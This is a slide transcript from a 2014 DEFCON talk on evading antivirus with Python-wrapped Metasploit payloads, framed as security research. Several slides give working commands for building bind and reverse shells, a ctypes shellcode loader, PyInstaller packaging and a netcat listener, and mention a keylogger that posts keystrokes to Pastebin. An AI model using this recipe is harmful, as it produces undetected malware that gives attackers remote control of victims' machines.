violent python defcon wall of sheep fri., aug 8, 2014
TRANSCRIPT
![Page 1: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/1.jpg)
Violent Python
DEFCONWall of Sheep
Fri., Aug 8, 2014
![Page 2: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/2.jpg)
Bio
![Page 3: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/3.jpg)
CNIT 124Advanced Ethical Hacking
![Page 4: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/4.jpg)
Violent Python
• Good coding principles– Exception handling– Modular design– Optimization– Commenting– Flow charts
• FORGET THEM ALL
![Page 5: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/5.jpg)
Violent Python
• We are hackers• We are here to BREAK STUFF• It should be fast and easy for a complete
novice to hack together a simple script to do something fun!
![Page 6: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/6.jpg)
![Page 7: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/7.jpg)
![Page 8: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/8.jpg)
![Page 9: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/9.jpg)
Projects
![Page 10: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/10.jpg)
![Page 11: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/11.jpg)
Antivirus
Ungh! Good God y'all...
What is it GOOD For?
![Page 12: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/12.jpg)
![Page 13: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/13.jpg)
Mikko Hypponen Video
![Page 14: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/14.jpg)
Metasploit Payloads
![Page 15: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/15.jpg)
Metasploit
• Hundreds of payloads• The simplest one: bind_tcp• Listens on a TCP port for commands
![Page 16: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/16.jpg)
Simple Reverse Shell
• One command to produce very simple Windows EXE malware
![Page 17: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/17.jpg)
Antivirus Catches It
![Page 18: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/18.jpg)
Norton v. Shell.exe
![Page 19: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/19.jpg)
Norton Identifies the Metasploit Packer
![Page 20: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/20.jpg)
VirusTotal: 37/49 Detections
![Page 21: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/21.jpg)
How to Become
007
![Page 22: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/22.jpg)
![Page 23: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/23.jpg)
Python v. AVRound 1
shell_bind_tcp
![Page 24: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/24.jpg)
Export Metasploit Payloads to C
![Page 25: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/25.jpg)
Use Ctypes Python Library
![Page 26: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/26.jpg)
Compile it on Windows
• Install these things, in order– Python 2.7– PyWin32– pip-Win– PyInstaller
• This creates an EXE file that listens on a TCP port
![Page 27: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/27.jpg)
DEMO
• On Kalimsfpayload windows/shell_bind_tcp C > foonano foo
• Change top tofrom ctypes import *shellcode = (
• Change bottom to);memorywithshell = create_string_buffer(shellcode, len(shellcode))shell = cast(memorywithshell, CFUNCTYPE(c_void_p))shell()
![Page 28: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/28.jpg)
DEMO
• On Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile --noconsole foo
![Page 29: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/29.jpg)
VirusTotal: 1/50 Detection
![Page 30: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/30.jpg)
Norton Support
• I Tweeted about this, and @NortonSupport replied
• VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning
• @NortonSupport gave me a link for a 30-day trial version :)
![Page 31: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/31.jpg)
Norton Wins!
![Page 32: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/32.jpg)
Kaspersky Wins!
• Avast! doesn't detect it• Kaspersky detects it as
HEUR:Trojan.Win32.Generic
![Page 33: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/33.jpg)
Python v. AVRound 2
shell_bind_tcpwith a delay
![Page 34: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/34.jpg)
![Page 35: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/35.jpg)
![Page 36: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/36.jpg)
DEMO
• On Kalicp foo foo2nano foo2x=raw_input("Press Enter to continue")
• On Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile foo2
![Page 37: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/37.jpg)
Norton, Avast, & MSE Lose!
![Page 38: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/38.jpg)
Kaspersky Wins!
![Page 39: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/39.jpg)
Python v. AVRound 3
shell_bind_tcpin two stages
no delay
![Page 40: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/40.jpg)
Other AV
• Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay
• Al these failed– Norton– Nod32– Avast!– 360 Internet Security– McAfee– Kaspersky
![Page 41: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/41.jpg)
Remember Mikko?
![Page 42: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/42.jpg)
F-Secure Wins!
![Page 43: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/43.jpg)
AV Challenge
![Page 44: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/44.jpg)
• Posted April 3, 2014• No reply from AV vendors, but Norton
improved its detection after that– Now a delay is required
![Page 45: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/45.jpg)
Python v. AVRound 4
shell_bind_tcpwith a delay
![Page 46: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/46.jpg)
INSTRUCTIONS
• On Kalimsfpayload windows/shell_reverse_tcp LHOST=192.168.119.252 C > revnano rev
• Change top tox=raw_input("Press Enter to continue")from ctypes import *shellcode = (
• Change bottom to);memorywithshell = create_string_buffer(shellcode, len(shellcode))shell = cast(memorywithshell, CFUNCTYPE(c_void_p))shell()
![Page 47: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/47.jpg)
INSTRUCTIONS
• On Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile rev
• On Kalinc –lp 4444
![Page 48: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/48.jpg)
Norton Loses
![Page 49: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/49.jpg)
Kaspersky Wins
![Page 50: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/50.jpg)
Advanced Malware Protection
![Page 51: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/51.jpg)
ty @ChrisAbdalla_1 from HP ESP TippingPoint
![Page 52: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/52.jpg)
• A friend in the financial industry tested Evil.exe on a system protected by FireEye
• FireEye gives no alerts and lets it post keystrokes right to Pastebin
![Page 53: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/53.jpg)
Python Keylogger
![Page 54: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/54.jpg)
Google "Python Keylogger"
• I used this one from 4 years ago
![Page 55: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/55.jpg)
Post Keystrokes to Pastebin
![Page 56: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/56.jpg)
Problem
• Pastebin busted me for making too many pastes in a 24-hour period
• So I wrote my own Pastebin imitation
![Page 57: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/57.jpg)
Kaspersky & Avast! LOSE
![Page 58: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/58.jpg)
Norton WINS!
![Page 59: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/59.jpg)
But just add a delay...
![Page 60: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/60.jpg)
F-Secure LOSES!
![Page 61: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/61.jpg)
PRODUCT ANNOUNCEMENT!
![Page 62: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/62.jpg)
Ultra-Advanced APT Tool
samsclass.info/evil.exe
![Page 63: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/63.jpg)
![Page 64: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/64.jpg)
UNSTOPPABLE
• None of these products stop it– Norton– McAfee– Kaspersky– Nod32– F-Secure– Avast!– Microsoft Security Essentials
![Page 65: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/65.jpg)
![Page 66: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/66.jpg)
![Page 67: Violent Python DEFCON Wall of Sheep Fri., Aug 8, 2014](https://reader035.vdocuments.mx/reader035/viewer/2022062719/56649ee55503460f94bf407e/html5/thumbnails/67.jpg)